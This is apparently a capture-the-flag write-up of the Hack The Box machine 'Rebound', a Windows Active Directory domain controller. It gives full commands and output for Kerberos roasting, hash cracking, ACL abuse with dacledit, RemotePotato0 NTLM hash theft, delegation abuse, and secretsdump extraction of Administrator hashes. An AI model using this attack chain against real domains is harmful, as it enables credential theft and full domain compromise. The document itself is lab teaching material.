A Windows Machine which comprises of a multitude of AD vulnerabilities.
Enumeration
âââ(kaliãŋkali)-[~/Desktop/CTF/Boxes/Rebound]
ââ$ sudo nmap -sC -sV -Pn 10.10.11.231
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-23 23:27 EST
Nmap scan report for rebound.htb (10.10.11.231)
Host is up (0.053s latency).
Not shown: 989 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-12-24 11:27:38Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
|_ssl-date: 2023-12-24T11:28:26+00:00; +7h00m01s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-12-24T11:28:27+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
|_ssl-date: 2023-12-24T11:28:26+00:00; +7h00m01s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
|_ssl-date: 2023-12-24T11:28:27+00:00; +7h00m01s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
| smb2-time:
| date: 2023-12-24T11:28:20
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.41 seconds
Enumerating SMB and LDAP yielded me nothing. But i was able to connect to SMB unauthenticated without perms using rpcclient so i proceeded with enumerating potential users with rid cycling.
kali)-[~/Desktop/CTF/Windows Stuff]
ââ$ crackmapexec smb 10.10.11.231 -u "Guest" -p ''
SMB 10.10.11.231 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.231 445 DC01 [+] rebound.htb\Guest:
âââ(kaliãŋkali)-[~/Desktop/CTF/Windows Stuff]
ââ$ ridenum 10.10.11.231 0 20000 Guest ''
[*] Attempting lsaquery first...This will enumerate the base domain SID
[*] Successfully enumerated base domain SID. Printing information:
Domain Name: rebound
Domain Sid: S-1-5-21-4078382237-1492182817-2568127209
[*] Moving on to extract via RID cycling attack..
[*] Enumerating user accounts.. This could take a little while.
Account name: rebound\Administrator
Account name: rebound\Guest
Account name: rebound\krbtgt
Account name: rebound\DC01$
Account name: rebound\ppaul
Account name: rebound\llune
Account name: rebound\fflock
Account name: rebound\jjones
Account name: rebound\mmalone
Account name: rebound\nnoon
Account name: rebound\ldap_monitor
Account name: rebound\oorend
Account name: rebound\winrm_svc
Account name: rebound\batch_runner
Account name: rebound\tbrady
Account name: rebound\delegator$
[*] RIDENUM has finished enumerating user accounts...
I then tried AS-REP roasting hoping for some quick wins for initial access but could not crack the hash which probbaly meant this was not intended.
âââ(kaliãŋkali)-[~/Desktop/CTF/Boxes/Rebound]
ââ$ impacket-GetNPUsers -dc-ip 10.10.11.231 -request -format hashcat -usersfile users.txt rebound.htb/
Impacket v0.11.0 - Copyright 2023 Fortra
$krb5asrep$23$jjones@REBOUND.HTB:06a2bf6dd3cfdb587387c2d53bf69a0c$f3b60b15f622dbbde4153402b6320449e99e574a4f5c691fe415cec470cb8f52c3d4d3ae1d2c0029b23f7cab1751aaa493cf48c63c93358774333705ee62c827d33ee30503a81955ae1105ba4532d106c8ec07611af9c23b3d43a57f12c92f9cac5cb1c13a0f3576dde3fa29b2e1e484c227e615ea196a9fef98a31c552767e2b73892228cf77e55607adc1fb82712d39537f5c88db47c8e12c1d713789de07c6f561d5a86f0cbecf54c9e7232355c8af83c69aa60fc54915019b7e965496a5b15fa6dbfc45a9df367033a9233bf20a64b7aa8356fc300f9c906cef1c308b33a58c01057f3b332638f1b
[-] User tbrady doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ppaul doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mmalone doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
ââ(kaliãŋkali)-[~/Desktop/CTF/Boxes/Rebound]
ââ$ hashcat jjones_asrep_hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
...
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$jjones@REBOUND.HTB:06a2bf6dd3cfdb5873...638f1b
Time.Started.....: Sat Dec 23 23:39:49 2023 (13 secs)
Time.Estimated...: Sat Dec 23 23:40:02 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1270.6 kH/s (0.86ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b6d3831303838] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 59%
Started: Sat Dec 23 23:39:31 2023
Stopped: Sat Dec 23 23:40:04 2023
After a very long time, I then stumbled across this article, talking about kerberoasting without pre-authentication. Similar to AS-REP roasting, the exploit leverages two things which we all have.
To keep myself sane from all the impacket branch errors i was receiving, i decided to use a Windows VM and perform the exploit using Rubeus and the /nopreauth parameter.
PS C:\Users\nicholas\Desktop > ./Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"rebound.htb" /dc:"DC01.rebound.htb" /nopreauth:"jjones" /spns:C:\Users\nicholas\Desktop\users.txt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.1
[*] Action: Kerberoasting
[*] Using jjones without pre-auth to request service tickets
[*] Target SPN : Administrator
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : Guest
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : krbtgt
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt
[*] Target SPN : DC01$
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt
[*] Target SPN : ppaul
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : llune
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : fflock
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : jjones
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : mmalone
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : nnoon
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : ldap_monitor
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt
[*] Target SPN : oorend
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : winrm_svc
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : batch_runner
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : tbrady
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : delegator$
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt
[*] Roasted hashes written to : C:\Users\nicholas\Desktop\kerberoastables.txt
Commando VM 01/19/2024 04:32:31
We can now try to crack these hashes using hashcat and rockyou giving us the password of ldap_monitor.
PS C:\Users\Admin\Downloads\hashcat-6.2.6\hashcat-6.2.6> .\hashcat.exe .\kerberoastables.txt .\rockyou.txt -m 13100
hashcat (v6.2.6) starting
Successfully initialized the NVIDIA main driver CUDA runtime library.
Failed to initialize NVIDIA RTC library.
* Device #1: CUDA SDK Toolkit not installed or incorrectly installed.
CUDA SDK Toolkit required for proper device support and utilization.
Falling back to OpenCL runtime.
* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
OpenCL API (OpenCL 3.0 CUDA 12.2.68) - Platform #1 [NVIDIA Corporation]
=======================================================================
* Device #1: NVIDIA GeForce RTX 3060 Ti, 8064/8191 MB (2047 MB allocatable), 38MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashfile '.\kerberoastables.txt' on line 1 ($krb5t...4D5680553C119B86D292DEFCDD2440D3): Separator unmatched
Hashfile '.\kerberoastables.txt' on line 2 ($krb5t...7605771D47A8BAF35BE68F999FEB075C): Separator unmatched
Hashfile '.\kerberoastables.txt' on line 4 ($krb5t...DF98A1F9E012EF7C76CB77E5571E4F16): Separator unmatched
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 333 MB
Dictionary cache hit:
* Filename..: .\rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
$krb5tgs$23$*ldap_monitor$rebound.htb$ldap_monitor*$bf482204b205a0ec5544a9c3efc7fd0b$eefbb2ffa6ccb05ad554d7e2116f87de4da6bfd4617f19a a1e83a4d3ecc700cafca0f3b2fa2f7840398ed5a12bbba7c5ec5a61e98b7876a2b2b8c9d5c874a269df71e6801167ed703dddd4cf661cc11242efbab0d581b1fe8b2b be8798330f912621d5a2cf34fce238c66b7f2fb20c37e2045ceccb2f89bc0a551ddfb43d024e3dc993e20d509da1905c813a48370672e5a372fd5995eb0698d0ee621 1aa7835be9b95df254c90fbcc2015bbc158d6dd91eac729adf9e3fee4d31fa7a26b9caefaf07f2fe6e76702b8e6dc359e20d83e9cf7b99ba3684e900fd38bf7645534 499cb23b0d973ac95f0b70deca3364a07d2775aaf51c27d2f92df7a8c8199ba1bfff9ed404c964f1eed2b376b09c4e190c3f9ddff8276ccddd1ae9829f88054efc27f fac6e475d67a5a838da89e0aac61d8011dea6058238693d9390213eeb0b9e1e7637cb1b4d0c27ced6bfd17e2abfdd72b13cc50138be85951f9fc5a9583d8c2dd039a3 325a25395a579ee122412342fa79827cd8a2743658f3ee0cd281e6e83b5b36d15ba27479c7276a4b58a8b9238aae7ff579ea72aaab0bdd3cb640f9a39df96a2b211df fb09b0a88940d6654bcd2de4daaeb69c0c35b0dc5ba88588ede34e4e26ea776b893e317c0691fbadad090d7b38dbabf32b37b7bc4bd32e6dabb3a3709727d18af0df9 9423ad2e81d40f0cef7adb272df4d536d2802fdf201f0ac05019194fb38b0dc60d4f9d284afdeea1be32265e9cedc3e360a6be7ffa08a1261beb933c049af1d9e8f8d da59e2c1cd3c7186422456f7ef52c2e42641aad761ea94f2d1837a477fceff40b6abc9eb9f6d7e6467ded8925d36dc54ff2a4cf567df708273e72f1e33e4cf8f194e3 39071a080c525af589811eac49e64776f492dbfdf9f32e63dd574bc6c5efabfa7fe28148cac01be172adde18e2105b1c56a048cc134726cbb8baa744de0c32fb2c502 2d43da79e3d3632b3d2c7d75b419802ce3110883cfc19e9a65f01b4006edb7e0ea889ed43ef9b073abb091da9db9114bc60a37fb0075d1856c2715a31fd87f826b499 997d703ab68f383c67c2d325189210f9fe00c2f40c46c771b04008384fa019cd2b2264aeb01de837a60a0bdd3a0e24b971c8a95d834d89c954bd1c02b0b5538863dca a15e16f5d848227305cb24d65ca106f30ce49c3928cdf96ccf595b8247564d2af9744023a83f9b8ba0a28672e766def4de9a07b9d297bbd9d28c7264f110ca063f0a4 4cd71547418240a9fa0711b4b0289057d123cb85d6db5b50e08fdcd844dfb8ac8aa94baabfceda9df0c9599d874878d30f3679a2f26a9fa2df65c6289593cade54:1G GR8t@$$4u
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ldap_monitor$rebound.htb$ldap_monitor*...cade54
Time.Started.....: Fri Jan 19 20:40:48 2024 (1 sec)
Time.Estimated...: Fri Jan 19 20:40:49 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 18875.9 kH/s (6.48ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 13697024/14344384 (95.49%)
Rejected.........: 0/13697024 (0.00%)
Restore.Point....: 12451840/14344384 (86.81%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 40432330 -> 0860478331
Hardware.Mon.#1..: Temp: 61c Fan: 69% Util: 29% Core:1995MHz Mem:6800MHz Bus:16
Started: Fri Jan 19 20:40:46 2024
Stopped: Fri Jan 19 20:40:49 2024
Initial Foothold
After obtaining domain credentials, I then proceeded to map the domain using bloodhound and managed to see route for lateral movement to obtain user access but not with the users we have on hand.
From the graph above, our main goal is either to
Obtain either PPAUL or FFLOCK user account OR
Enroll ourselves as a group member of SERVICEMGMT somehow
Obtain either PPAUL or FFLOCK user account
Using the existing password obtained from ldap_monitor's account, i performed password spraying using crackmapexec and managed to get a match on the user oorend .
Sadly, the password spraying did not work on both PPAUL and FFLOCK.
Enroll ourselves as a group member of SERVICEMGMT somehow
I then remembered some ACLs permissions are not explicitly shown in bloodhound and must be explicitly enumerated using something like PowerView's FindDomainObjectAcl. However I kept recieving the error Server not operational.
I then struggled to find a Linux alternative till i finally stumbled across impacket's dacledit which essentially allows me to enumerate whether the principal oorend has any permissions over the target SERVICEMGMT group.
Referencing the bloodhound graph earlier, SERVICEMGMT group has GenericAll privileges over the OU SERVICE USERS or Full Control.
Once again, we can use impacket's dacledit to grant us full control perms as oorend .
âââ(kaliãŋkali)-[~/âĻ/Boxes/Rebound/impacket-master/examples]
ââ$ python3 dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'oorend' -target-dn 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' rebound.htb/'oorend':'1GR8t@$$4u' -dc-ip 10.10.11.231 -k -use-ldaps
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20240119-175009.bak
[*] DACL modified successfully!
As oorend, we have full control over the OU Service Users and subsequently winrm_svc.
We can now change the password of winrm_svc easily using rpcclient and subsequently ps-remote to get the user flag.
ââ$ rpcclient -U rebound.htb/oorend rebound.htb
Password for [REBOUND.HTB\oorend]:
rpcclient $> setuserinfo2 winrm_svc P@ssw0rd
Usage: setuserinfo2 username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> setuserinfo2 winrm_svc 23 P@ssw0rd
rpcclient $>
Privilege Escalation
Using query user, we see that the user tbrady is logged on.
PS C:\Users\winrm_svc>
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
tbrady console 1 Active none 25/11/2023 8:24 AM
For some reason, the same command no longer gives me this output as of 20/1/2024
PS C:\Users\winrm_svc\Documents> query user
No User exists for *
From here, we can utilize RemotePotato0 which allows us to get the ntlm hash of any user logged in on the target machine which in this case is tbrady.
âââ(kaliãŋkali)-[~/Desktop/CTF/Boxes/Rebound]
ââ$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999
PS C:\Users\winrm_svc\Documents> .\RemotePotato0.exe -m 2 -x 10.10.16.17 -p 9999 -s 1
[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on (nul
l) to your victim machine on port 9999
[*] Example Network redirector:
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:{{ThisMachineIp}}:9999
[*] Starting the RPC server to capture the credentials hash from the user authentication!!
[*] Spawning COM object in the session: 1
[*] Calling StandardGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] RPC relay server listening on port 9997 ...
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] IStoragetrigger written: 104 bytes
[*] ServerAlive2 RPC Call
[*] ResolveOxid2 RPC call
[+] Received the relayed authentication on the RPC relay server on port 9997
[*] Connected to RPC Server 127.0.0.1 on port 9999
[+] User hash stolen!
NTLMv2 Client : DC01
NTLMv2 Username : rebound\tbrady
NTLMv2 Hash : tbrady::rebound:25cb25d078aa7cda:5d015a1e05ab333b0fc68d64bd26e5c7:01010000000000004c7bf203dc4bda0194875567cf8b3e9e0000000002000e00720
0650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e
0064002e00680074006200050016007200650062006f0075006e0064002e00680074006200070008004c7bf203dc4bda0106000400060000000800300030000000000000000100000000200
000dec4cf9ef2d2a48c6c2af0bea86ea62183c13f07d827c4a1ebcfecd25e1a2f800a00100000000000000000000000000000000000090000000000000000000000
Cracking with rockyou, we get the password 543BOMBOMBUNmanda .
Looking back at bloodhound, we see that user tbrady has ReadGMSAPassword over DELEGATOR$.
The name of the account suggests exploiting something regarding delegations. To enumerate the delegation properties of the DELEGATOR$ account, we need to use PoweView's GetNetComputer and filter the properties.
We see that $DELEGATOR has the msds-allowedtodelegateto property for the service http/dc01.rebound.htb.
However, from our bloodhound output, Administrator user cannot be delegated.
With reference to this, RBCD (Resource-based Constrained Delegation) can be used to bypass this.
To perform this attack, we need two things which we already have.
A account with SPN - ldap_monitor user fiits the requirement
An account with the capability to edit the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of another object OR
Using impacket's RBCD, we can exploit this by appending value of ldap_monitor to msDS-AllowedToActOnBehalfOfOtherIdentity attribute of DELEGATOR$.
âââ(kaliãŋkali)-[~/Desktop/CTF/Boxes/Rebound]
ââ$ impacket-rbcd 'rebound.htb/delegator$' -delegate-to 'delegator$' -delegate-from ldap_monitor -use-ldaps -action write -k -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Accounts allowed to act on behalf of other identity:
[*] ldap_monitor (S-1-5-21-4078382237-1492182817-2568127209-7681)
[*] ldap_monitor can already impersonate users on delegator$ via S4U2Proxy
[*] Not modifying the delegation rights.
[*] Accounts allowed to act on behalf of other identity:
[*] ldap_monitor (S-1-5-21-4078382237-1492182817-2568127209-7681)
We can now obtain a ticket via delegation operation.
Once the ticket is obtained, it can be used in a S4U2proxy request, made by DELEGATOR$, on behalf of the impersonated user, to obtain access to one of the services DELEGATOR$ can delegate to.
ââ(kaliãŋkali)-[~/Desktop/CTF/Boxes/Rebound]
ââ$ impacket-getST -spn "http/dc01.rebound.htb" -impersonate "dc01$" -additional-ticket "dc01$.ccache" "rebound.htb/delegator$" -hashes aad3b435b51404eeaad3b435b51404ee:177ae2598e4f659488b6cd0a237df1fc -k -no-pass -dc-ip 10.10.11.231
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Getting TGT for user
[*] Impersonating dc01$
[*] Using additional ticket dc01$.ccache instead of S4U2Self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc01$.ccache
Finally, we can get the Administrator hash via secretsdump.
ââ(kaliãŋkali)-[~/Desktop/CTF/Boxes/Rebound]
ââ$ impacket-secretsdump -k dc01.rebound.htb -just-dc-user administrator -dc-ip 10.10.11.231 -debug
Impacket v0.11.0 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /home/kali/.pyenv/versions/3.9.16/lib/python3.9/site-packages/impacket
[+] Using Kerberos Cache: dc01$.ccache
[+] Domain retrieved from CCache: rebound.htb
[+] SPN CIFS/DC01.REBOUND.HTB@REBOUND.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for HTTP/DC01.REBOUND.HTB@REBOUND.HTB
[+] Using TGS from cache
[+] Changing sname from http/dc01.rebound.htb@REBOUND.HTB to CIFS/DC01.REBOUND.HTB@REBOUND.HTB and hoping for the best
[+] Username retrieved from CCache: dc01$
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Calling DRSCrackNames for administrator
[+] Calling DRSGetNCChanges for {37857665-6e2e-4f12-9976-5c9babcd8282}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=rebound,DC=htb
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Finished processing and printing user's hashes, now printing supplemental information
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:32fd2c37d71def86d7687c95c62395ffcbeaf13045d1779d6c0b95b056d5adb1
Administrator:aes128-cts-hmac-sha1-96:efc20229b67e032cba60e05a6c21431f
Administrator:des-cbc-md5:ad8ac2a825fe1080
[*] Cleaning up...
